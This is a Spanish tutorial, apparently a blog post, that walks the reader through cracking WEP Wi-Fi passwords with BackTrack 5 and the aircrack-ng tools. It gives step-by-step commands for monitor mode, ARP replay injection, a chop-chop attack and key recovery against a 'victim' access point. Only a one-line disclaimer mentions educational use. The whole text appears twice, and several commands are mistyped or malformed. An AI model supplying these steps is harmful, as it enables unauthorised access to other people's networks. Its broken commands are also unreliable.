Bienvenidos hoy les enseñare a sacar claves wep wifi. Con un pendrive
Bueno enpezemos...
Un wifi es un mecanismo de conexión de dispositivos electrónicos de forma inalámbrica. Los dispositivos habilitados con Wi-Fi, tales como: un ordenador personal, una consola de videojuegos, un smartphone o un reproductor de audio digital, pueden conectarse a Internet a través de un punto de acceso de red inalámbrica. Dicho punto de acceso (o hotspot) tiene un alcance de unos 20 metros (65 pies) en interiores y al aire libre una distancia mayor. Pueden cubrir grandes áreas la superposición de múltiples puntos de acceso .
Wi-Fi es una marca de la Wi-Fi Alliance (anteriormente la WECA: Wireless Ethernet Compatibility Alliance), la organización comercial que adopta, prueba y certifica que los equipos cumplen los estándares 802.11 relacionados a redes inalámbricas de área local.
Bueno el BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.
Se deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX. WHAX es la evolución del Whoppix (WhiteHat Knoppix), el cual pasó a basarse en la distribución Linux SLAX en lugar de Knoppix. La última versión de esta distribución cambió el sistema base, antes basado en Slax y ahora en Ubuntu.1
Incluye una larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless. Fue incluida en el puesto 7 de la famosa lista "Top 100 Network Security Tools" de 2006.2
Bueno enpezemos a instalar en BackTrack en un pendrive...
Lo primero que vamos a hacer es instalar el backtrack 5 en un pendrive.
Para eso vean este video te enseñan bien como instalar el backtrack en un pendrive
Hay que descargar el programa UnetBootin actualizado haciendo un click aqui
Si quieren otro programa para instalar el backtrack el un pendrive entonces miren este post
Para descargar el BackTrack hagan click en el siguiente link y elijan con que quieren descargarlo ejemplo "BT5-GNOME-32.iso" depende tambien de si tienen el x32 0 x64 bits.
o si quieren otra manera de descargarlo vean este video...
El link para descargar el backtrack del video es este
Bueno para abrir el back fijence en el video de arriba
Bueno enpezemos con el hack.
Bueno primero habran la ventanita que se muestra aca abajo
les va a aprecer algo como esto...
bueno adentro de la consola escribimos lo siguiente...y despues enter (cada vez que pones un codigo tenes que apretar enter)
ifconfig
Despues ponemos...
ifconfig wlan0 up
luego...
airmon-ng start wlan0
y luego...
airodump-ng mon0
te va a aprecer las redes disponibles, tenes que eligir uno de tipo web (en donde dice cipher te dice si es wep)
Ahora vamos a ubicar nuestra red wifi de la lista y copiamos el número hexadecimal de la columna denominada BSSID (esta es en realidad la dirección MAC del router). En este caso, la red se llama “wep-network” y podemos ver en la columna de seguridad (ENC) que esta protegida con WEP. El siguiente paso es enfocarnos en la tarjeta wifi para escuchar sólo los paquetes relacionados con la red inalámbrica a la que queremos acceder y bloquearlo en el canal correcto (Para esto nos fijamos en la columna CH), por defecto, estamos escaneando todos los canales, por lo que estamos viendo un pequeño porcentaje del tráfico que nos interesa. Podemos bloquearlo copiando primero el BSSID y presionando las teclas CTRL+C para finalizar la ejecución del comando actual
luego de precionar CTRL+C
escriban lo siguiente...
airodump-ng --bssid "aca escribimos el mac-adress al que queremos hackear" -c "aca el canal que usa vemos el canal en donde dice CH" -w "aca escribimos la variable en donde queremos que se guarden lo datos ejemplo: datos" mon0
va a aprecer algo como esto...
ya entramos.
bueno ahora hay que asociarnos para eso habran una nueva consola y escriban lo siquiente...
airmon-ng -1 0 -e "aca escribimos el nombre de la red wifi que la encontramos en donde dice essid" -a "aca la mac-adress de la que queres atacar" -h "aca escribimos nuestra mac-address que explicare abajo" mon0
Para saber nuestra macaddress abrimos una nueva consola y escribimos ifconfig abajo de todo dice mac-address
si tenes problemas mira este enlace
http://elgeek.com/236/como-obtener-tu-mac-address
Bueno poniendo el codigo anterior ya nos asociamos ahora hay que insertar paquetes al la red wifi que seleccionamos...
aireplay-ng -3 -b "la mac-address del que queremos atacar " -h "nuestra mac-address" mon0
y ya enserta paquetes, esperamos que #data aumente rapidamente digamos hasta el 20.000 de datos.
cuando ya haya mandado los suficientes datos escribimos en otra consola lo siquiente mientras sigue mandando datos.
airecrack-ng *.cap
y mas abajo les va a aprecer la contraseña de el que atacaste
y listo
Hay otra manera de hackear redes, mejor dicho otro ataque llamado chop-chop que les enseñare a continuacion
Primero que todo miraremos como se llama nuestra interfaz de red inalambrica con el siguinte comando
iwconfig
Como podemos ver en la imagen anterior mi dispositvo se llama wlan0
lo siguiente que haremos es poner muestro dispostivo en modo promiscuo (modo monitor)
airmon-ng stop wlan0
airmon-ng start wlan0
Ahora localizamos el AP
airodump-ng wlan0
Como podemos ver en la imagen anterior tenemos un AP con ESSID JONATHAN y usa el protocolo WEP
airodump-ng c 1 -w prueba -i wlan0
El siguiente paso es asociarnos contra el AP victima con el siguinte comando
aireplay-ng -1 0 -e JONATHAN -a 00:0A:56:9A:18B -h 00:E0:4C:04:03:47 wlan0
Ahora vamos a usar el ataque Chop-Chop
aireplay-ng -4 -h 00:E0:4C:04:03:47 -b 00:0A:56:9A:18B
wlan0
Despues presionamos la tecla “y”
Ahora creamos una petición de paquete arp usando el archivo .xor:
packetforge-ng -0 -a 00:0A:56:9A:18B -h 00:E0:4C:04:03:47 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0914-174512.xor -w arp-request
Ahora enviaremos el paquete ARP creado anteriormente
aireplay-ng -2 -h 00:E0:4C:04:03:47 -r arp-request wlan0
En la siguiente imagen podemos ver en la columna #Data Ya tenenemos los paquetes necesarios para poder lograr descifrar la contraseña
Ahora vamos a descifrar la contraseña con el siguiente comando
aircrack-ng -n 64 -z -f 1 -e JONATHAN -b 00:0A:56:9A:18B prueba-02*.ivs
Como podemos ver en la imagen anterrior tenemos la contraseña en tipo ASCII y la contraseña es WALDO
Este tipo de ataque es muy usado ya que el intruso no tiene que esperar a que un cliente esta autenticado en el AP.
Toda la información aquí expuesta es para uso educativo y/o científico. Todo lo que hagas con estos programas es responsabilidad tuya.
si quieren ver un video miren este video...
Bueno enpezemos...
Un wifi es un mecanismo de conexión de dispositivos electrónicos de forma inalámbrica. Los dispositivos habilitados con Wi-Fi, tales como: un ordenador personal, una consola de videojuegos, un smartphone o un reproductor de audio digital, pueden conectarse a Internet a través de un punto de acceso de red inalámbrica. Dicho punto de acceso (o hotspot) tiene un alcance de unos 20 metros (65 pies) en interiores y al aire libre una distancia mayor. Pueden cubrir grandes áreas la superposición de múltiples puntos de acceso .
Wi-Fi es una marca de la Wi-Fi Alliance (anteriormente la WECA: Wireless Ethernet Compatibility Alliance), la organización comercial que adopta, prueba y certifica que los equipos cumplen los estándares 802.11 relacionados a redes inalámbricas de área local.
Bueno el BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.
Se deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX. WHAX es la evolución del Whoppix (WhiteHat Knoppix), el cual pasó a basarse en la distribución Linux SLAX en lugar de Knoppix. La última versión de esta distribución cambió el sistema base, antes basado en Slax y ahora en Ubuntu.1
Incluye una larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless. Fue incluida en el puesto 7 de la famosa lista "Top 100 Network Security Tools" de 2006.2
Bueno enpezemos a instalar en BackTrack en un pendrive...
Lo primero que vamos a hacer es instalar el backtrack 5 en un pendrive.
Para eso vean este video te enseñan bien como instalar el backtrack en un pendrive
Hay que descargar el programa UnetBootin actualizado haciendo un click aqui
Si quieren otro programa para instalar el backtrack el un pendrive entonces miren este post
Para descargar el BackTrack hagan click en el siguiente link y elijan con que quieren descargarlo ejemplo "BT5-GNOME-32.iso" depende tambien de si tienen el x32 0 x64 bits.
o si quieren otra manera de descargarlo vean este video...
El link para descargar el backtrack del video es este
Bueno para abrir el back fijence en el video de arriba
Bueno enpezemos con el hack.
Bueno primero habran la ventanita que se muestra aca abajo
les va a aprecer algo como esto...
bueno adentro de la consola escribimos lo siguiente...y despues enter (cada vez que pones un codigo tenes que apretar enter)
ifconfig
Despues ponemos...
ifconfig wlan0 up
luego...
airmon-ng start wlan0
y luego...
airodump-ng mon0
te va a aprecer las redes disponibles, tenes que eligir uno de tipo web (en donde dice cipher te dice si es wep)
Ahora vamos a ubicar nuestra red wifi de la lista y copiamos el número hexadecimal de la columna denominada BSSID (esta es en realidad la dirección MAC del router). En este caso, la red se llama “wep-network” y podemos ver en la columna de seguridad (ENC) que esta protegida con WEP. El siguiente paso es enfocarnos en la tarjeta wifi para escuchar sólo los paquetes relacionados con la red inalámbrica a la que queremos acceder y bloquearlo en el canal correcto (Para esto nos fijamos en la columna CH), por defecto, estamos escaneando todos los canales, por lo que estamos viendo un pequeño porcentaje del tráfico que nos interesa. Podemos bloquearlo copiando primero el BSSID y presionando las teclas CTRL+C para finalizar la ejecución del comando actual
luego de precionar CTRL+C
escriban lo siguiente...
airodump-ng --bssid "aca escribimos el mac-adress al que queremos hackear" -c "aca el canal que usa vemos el canal en donde dice CH" -w "aca escribimos la variable en donde queremos que se guarden lo datos ejemplo: datos" mon0
va a aprecer algo como esto...
ya entramos.
bueno ahora hay que asociarnos para eso habran una nueva consola y escriban lo siquiente...
airmon-ng -1 0 -e "aca escribimos el nombre de la red wifi que la encontramos en donde dice essid" -a "aca la mac-adress de la que queres atacar" -h "aca escribimos nuestra mac-address que explicare abajo" mon0
Para saber nuestra macaddress abrimos una nueva consola y escribimos ifconfig abajo de todo dice mac-address
si tenes problemas mira este enlace
http://elgeek.com/236/como-obtener-tu-mac-address
Bueno poniendo el codigo anterior ya nos asociamos ahora hay que insertar paquetes al la red wifi que seleccionamos...
aireplay-ng -3 -b "la mac-address del que queremos atacar " -h "nuestra mac-address" mon0
y ya enserta paquetes, esperamos que #data aumente rapidamente digamos hasta el 20.000 de datos.
cuando ya haya mandado los suficientes datos escribimos en otra consola lo siquiente mientras sigue mandando datos.
airecrack-ng *.cap
y mas abajo les va a aprecer la contraseña de el que atacaste
y listo
Hay otra manera de hackear redes, mejor dicho otro ataque llamado chop-chop que les enseñare a continuacion
Primero que todo miraremos como se llama nuestra interfaz de red inalambrica con el siguinte comando
iwconfig
Como podemos ver en la imagen anterior mi dispositvo se llama wlan0
lo siguiente que haremos es poner muestro dispostivo en modo promiscuo (modo monitor)
airmon-ng stop wlan0
airmon-ng start wlan0
Ahora localizamos el AP
airodump-ng wlan0
Como podemos ver en la imagen anterior tenemos un AP con ESSID JONATHAN y usa el protocolo WEP
airodump-ng c 1 -w prueba -i wlan0
El siguiente paso es asociarnos contra el AP victima con el siguinte comando
aireplay-ng -1 0 -e JONATHAN -a 00:0A:56:9A:18B -h 00:E0:4C:04:03:47 wlan0
Ahora vamos a usar el ataque Chop-Chop
aireplay-ng -4 -h 00:E0:4C:04:03:47 -b 00:0A:56:9A:18B
wlan0
Despues presionamos la tecla “y”
Ahora creamos una petición de paquete arp usando el archivo .xor:
packetforge-ng -0 -a 00:0A:56:9A:18B -h 00:E0:4C:04:03:47 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0914-174512.xor -w arp-request
Ahora enviaremos el paquete ARP creado anteriormente
aireplay-ng -2 -h 00:E0:4C:04:03:47 -r arp-request wlan0
En la siguiente imagen podemos ver en la columna #Data Ya tenenemos los paquetes necesarios para poder lograr descifrar la contraseña
Ahora vamos a descifrar la contraseña con el siguiente comando
aircrack-ng -n 64 -z -f 1 -e JONATHAN -b 00:0A:56:9A:18B prueba-02*.ivs
Como podemos ver en la imagen anterrior tenemos la contraseña en tipo ASCII y la contraseña es WALDO
Este tipo de ataque es muy usado ya que el intruso no tiene que esperar a que un cliente esta autenticado en el AP.
Toda la información aquí expuesta es para uso educativo y/o científico. Todo lo que hagas con estos programas es responsabilidad tuya.
si quieren ver un video miren este video...